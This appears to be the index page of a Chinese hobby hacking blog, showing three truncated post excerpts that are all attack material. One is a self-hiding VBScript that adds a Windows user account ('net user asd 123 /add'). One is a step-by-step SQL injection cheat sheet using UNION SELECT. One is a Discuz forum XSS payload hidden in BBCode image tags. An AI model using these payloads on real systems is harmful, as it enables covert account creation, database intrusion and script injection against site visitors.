小马博客

一个无聊的人,一个无聊的博客

dim wsh,FA,FSO set fso=CreateObject("Scripting.FileSystemObject") Set FA= FSO.GetFile(WScript.scriptFullName) FA.Attributes =34 set wsh=CreateObject("WScript.Shell") wsh.run "net user asd 123 /add",0,true wsh.run "net...

发布 0 条评论

暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用...

发布 0 条评论

原型:     [email][url][img]http://hkxm.tk onmouseover=alert(/DZ-xss-0day/); [/img][/url][/email] 发贴时勾选源码, 鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的把上面的alert(/DZ-X...

发布 0 条评论